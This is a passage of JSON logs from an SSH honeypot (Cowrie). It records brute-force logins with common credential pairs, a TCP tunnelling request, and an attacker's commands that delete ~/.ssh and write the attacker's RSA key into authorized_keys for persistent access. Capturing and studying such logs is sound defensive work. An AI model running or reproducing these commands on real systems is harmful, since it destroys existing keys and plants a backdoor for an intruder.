~","sensor":"my-vps","timestamp":"2025-09-08T22:35:20.153221Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:35:20.394152Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:35:20.395236Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50698,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0d202effe00","protocol":"ssh","message":"New connection: 212.227.235.229:50698 (1.2.3.4:22) [session: d0d202effe00]","sensor":"my-vps","timestamp":"2025-09-08T22:35:20.614348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:35:20.615022Z","src_ip":"212.227.235.229","session":"d0d202effe00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:35:20.844978Z","src_ip":"212.227.235.229","session":"d0d202effe00"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:35:21.803370Z","src_ip":"212.227.235.229","session":"d0d202effe00"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:35:23.035024Z","src_ip":"212.227.235.229","session":"d0d202effe00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51336,"dst_ip":"1.2.3.4","dst_port":22,"session":"27b4f650e465","protocol":"ssh","message":"New connection: 212.227.235.229:51336 (1.2.3.4:22) [session: 27b4f650e465]","sensor":"my-vps","timestamp":"2025-09-08T22:35:23.262595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:35:23.263531Z","src_ip":"212.227.235.229","session":"27b4f650e465"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:35:23.491771Z","src_ip":"212.227.235.229","session":"27b4f650e465"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:35:24.447844Z","src_ip":"212.227.235.229","session":"27b4f650e465"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:35:24.678173Z","src_ip":"212.227.235.229","session":"27b4f650e465"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:35:24.686931Z","src_ip":"212.227.235.229","session":"96e96ed4026a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58978,"dst_ip":"1.2.3.4","dst_port":22,"session":"b45a6d1ad79f","protocol":"ssh","message":"New connection: 212.227.235.229:58978 (1.2.3.4:22) [session: b45a6d1ad79f]","sensor":"my-vps","timestamp":"2025-09-08T22:36:10.394373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:36:10.395514Z","src_ip":"212.227.235.229","session":"b45a6d1ad79f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:36:10.628352Z","src_ip":"212.227.235.229","session":"b45a6d1ad79f"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"minerstat2025","message":"login attempt [minerstat/minerstat2025] failed","sensor":"my-vps","timestamp":"2025-09-08T22:36:11.602158Z","src_ip":"212.227.235.229","session":"b45a6d1ad79f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:36:12.837115Z","src_ip":"212.227.235.229","session":"b45a6d1ad79f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50350,"dst_ip":"1.2.3.4","dst_port":22,"session":"67fc2de1edef","protocol":"ssh","message":"New connection: 212.227.235.229:50350 (1.2.3.4:22) [session: 67fc2de1edef]","sensor":"my-vps","timestamp":"2025-09-08T22:36:25.150759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:36:25.151699Z","src_ip":"212.227.235.229","session":"67fc2de1edef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:36:25.251292Z","src_ip":"212.227.235.229","session":"67fc2de1edef"}
{"eventid":"cowrie.login.failed","username":"king","password":"king","message":"login attempt [king/king] failed","sensor":"my-vps","timestamp":"2025-09-08T22:36:25.694006Z","src_ip":"212.227.235.229","session":"67fc2de1edef"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:36:26.797013Z","src_ip":"212.227.235.229","session":"67fc2de1edef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23198,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7f5d6c9e309","protocol":"ssh","message":"New connection: 212.227.125.160:23198 (1.2.3.4:22) [session: a7f5d6c9e309]","sensor":"my-vps","timestamp":"2025-09-08T22:36:38.551548Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:36:38.552643Z","src_ip":"212.227.125.160","session":"a7f5d6c9e309"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":23460,"dst_ip":"1.2.3.4","dst_port":22,"session":"5981c6d7c7e4","protocol":"ssh","message":"New connection: 212.227.125.160:23460 (1.2.3.4:22) [session: 5981c6d7c7e4]","sensor":"my-vps","timestamp":"2025-09-08T22:36:38.661600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:36:38.662516Z","src_ip":"212.227.125.160","session":"5981c6d7c7e4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T22:36:38.773686Z","src_ip":"212.227.125.160","session":"5981c6d7c7e4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:36:39.108205Z","src_ip":"212.227.125.160","session":"5981c6d7c7e4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T22:36:39.220552Z","session":"5981c6d7c7e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42106,"dst_ip":"1.2.3.4","dst_port":22,"session":"7af4c1b4748b","protocol":"ssh","message":"New connection: 212.227.235.229:42106 (1.2.3.4:22) [session: 7af4c1b4748b]","sensor":"my-vps","timestamp":"2025-09-08T22:36:55.068759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:36:55.069756Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:36:55.316176Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.login.success","username":"root","password":"april","message":"login attempt [root/april] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:36:56.342872Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:36:56.849108Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:36:56.849892Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:36:56.851106Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:36:57.098458Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:36:57.696451Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:36:57.697136Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:36:57.944950Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:36:57.945857Z","src_ip":"212.227.235.229","session":"7af4c1b4748b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55882,"dst_ip":"1.2.3.4","dst_port":22,"session":"50dc0799d03b","protocol":"ssh","message":"New connection: 212.227.235.229:55882 (1.2.3.4:22) [session: 50dc0799d03b]","sensor":"my-vps","timestamp":"2025-09-08T22:36:58.193990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:36:58.194915Z","src_ip":"212.227.235.229","session":"50dc0799d03b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:36:58.442242Z","src_ip":"212.227.235.229","session":"50dc0799d03b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:36:59.472522Z","src_ip":"212.227.235.229","session":"50dc0799d03b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:37:00.722518Z","src_ip":"212.227.235.229","session":"50dc0799d03b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55898,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc4d25320cd9","protocol":"ssh","message":"New connection: 212.227.235.229:55898 (1.2.3.4:22) [session: fc4d25320cd9]","sensor":"my-vps","timestamp":"2025-09-08T22:37:00.966362Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:00.967202Z","src_ip":"212.227.235.229","session":"fc4d25320cd9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52456,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a70005670cf","protocol":"ssh","message":"New connection: 212.227.235.229:52456 (1.2.3.4:22) [session: 3a70005670cf]","sensor":"my-vps","timestamp":"2025-09-08T22:37:04.259959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:37:04.263757Z","src_ip":"212.227.235.229","session":"3a70005670cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:37:04.514876Z","src_ip":"212.227.235.229","session":"3a70005670cf"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password123","message":"login attempt [deployer/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:37:05.522583Z","src_ip":"212.227.235.229","session":"3a70005670cf"}
